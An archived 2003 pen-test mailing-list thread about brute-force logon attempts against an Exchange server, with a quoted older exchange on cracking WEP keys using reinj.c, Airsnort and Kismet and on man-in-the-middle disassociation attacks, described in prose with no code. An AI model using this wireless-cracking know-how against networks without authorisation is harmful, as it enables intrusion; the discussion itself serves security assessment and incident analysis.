RE: Strange logon attempts to Win2k server

From: Sean (sean_at_comnet.com)
Date: 09/25/03

  • Next message: Atul Porwal: "How to find PDF Salt" 
    To: "Pen-Test" <pen-test@securityfocus.com>
Date: Wed, 24 Sep 2003 21:50:37 -0600

    Chris,

    This may be related to what I had found on one of my clients servers
    recently. Their server was being overloaded by spam that was being sent out
    through Exchange. I knew that they were not running an open relay, and
    quickly ran down the possibilities as to what could have been happening.
    After turning up all the logging, my suspicions were confirmed. The
    spammers had started attempting to authenticate to the Exchange server for
    permission to send mail. They had guessed the passwords for both the
    administrator and backup accounts (yes, they were very poor passwords), and
    were sending massive amounts of spam through the Exchange server. I imagine
    the attempts that you are seeing are this same type of attempted access.

    I guess now spammers are resulting to felony network intrusion to spread
    their pee-pee grow big pills. :)

    -----Original Message-----
    From: Chris Harrington [mailto:cmh@nmi.net]
    Sent: Thursday, September 11, 2003 10:09 AM
    To: pen-test@securityfocus.com
    Subject: Strange logon attempts to Win2k server

    All,

    A customer notified us that someone / something tried to log into one of
    their servers repeatedly but failed. It appears to be some sort of
    script since it tried 6 usernames with 23 passwords in under 2 minutes.
    The event log is a typical 529 event ID. The logon type was 3 (network)
    and the logon process was advapi. I generally see this when someone
    tries to log in to IIS using cleartext authentication. There is no
    evidence in the w3svc logs of these attempts. There were no successful
    logins using that logon process.

    This server is an Exchange server with port 25 accessible from the
    Internet. I have verified this is the only port open by scan and
    firewall rules.

    1. Can anyone access the advapi (or any domain login process) over port
    25 on an Exchange server? I did not think that SMTP AUTH could do that..

    2. What other common programs use the advapi call for authentication?

    The usernames that were tried are webmaster, admin, root, test, master,
    web. Each one was tried in that order with 23 passwords, all failed.

    3. Does anyone know what script / app / virus / worm that could be?

    Any insights??

    Thanks,

    --Chris

    -----Original Message-----
    From: Bartholomew, Brian J [mailto:BartholomewBJ@state.gov]
    Sent: Monday, July 21, 2003 10:48 AM
    To: 'Ian Chilvers'; pen-test@securityfocus.com
    Subject: RE: V/Scan for Wireless LANs

            I have successfully cracked 40 and 104 bit WEP keys with reinj.c
    and Airsnort or Kismet. Just use Airsnort or Kismet to listen and store
    the "interesting" traffic, and reinj.c to create it. One usually needs
    between 100 MB to 1 GB of traffic to crack the key, but once the data
    is captured, the key cracks in a matter of seconds.

            There is a good paper that describes the weak implementation of
    initialization vectors entitled "Weaknesses in the Key Scheduling
    Algorithm of RC4" by Scott Fluhrer, Itsik Mantin, and Adi Shamir. I
    suggest reading it.

            I mentioned Kismet above. It is one of the best tools out there
    for WLAN testing. It allows you to perform a variety of things to the
    AP such as spoofing, disassociations, capture traffic, sniff out
    "hidden" APs, etc. It is all around a better tool to use than
    NetStumbler since it detects APs passively, instead of broadcasting
    everywhere. It even detects other NetStumbler clients.

            The suggestion to brute force the key is not a good idea since,
    as one person already pointed out, it would take a very long time to BF
    it. It could be done I guess, but by the time the key is cracked, they
    would have
    probably already changed it.

            Personally I think the best way of attack is to use some sort of
    man in the middle attack. If you are able to disassociate the clients
    from that AP and have them re-associate with you, you are golden :).

    Brian J. Bartholomew
    U.S. Dept of State, Bureau of Diplomatic Security
    Computer Incident Response Team
    (202)663-2304

    -----Original Message-----
    From: Ian Chilvers [mailto:Ian.Chilvers@prolateral.com]
    Sent: Friday, July 18, 2003 12:45 PM
    To: pen-test@securityfocus.com
    Subject: V/Scan for Wireless LANs

    Hi all

    We've been asked to perform a vulnerability assessment for a company
    that has a Wireless LAN. The W/LAN is running WEP with a random key
    generated, rather than a dictionary word.

    Are there any tools out there that can brute force a WEP.

    Take this example. A person parks the car in the car park and sniffs
    the air waves with a product like NetStumbler. He discovers the W/LAN
    but with WEP.

    Is there a tool he can use to discover the WEP key (possible by brute
    force)

    If there isn't such a tool, how does this sound for an idea.

    Run a app that starts at binary 0's and counts upto 128bits of 1's For
    each sequence listen to see if there are any sensible packets or even
    send out a DHCP discover request to see if you get a reply. This would
    then possibly give you the WEP key.

    Any comments

    Ian....

    ------------------------------------------------------------------------ 

    ---
KaVaDo is the first and only company that provides a complete and an
integrated suite of Web application security products, allowing you to:
 - assess your entire Web environment with a Scanner,
 - automatically set positive security policies for real-time
protection,
   and
 - maintain such policies at the Application Firewall without
compromising busines performance.
For more information on KaVaDo and to download a FREE white paper on Web
applications - security policy automation, please visit:
http://www.kavado.com/ad.htm
------------------------------------------------------------------------
----
------------------------------------------------------------------------
---
------------------------------------------------------------------------
----
---------------------------------------------------------------------------
----------------------------------------------------------------------------
  • Next message: Atul Porwal: "How to find PDF Salt"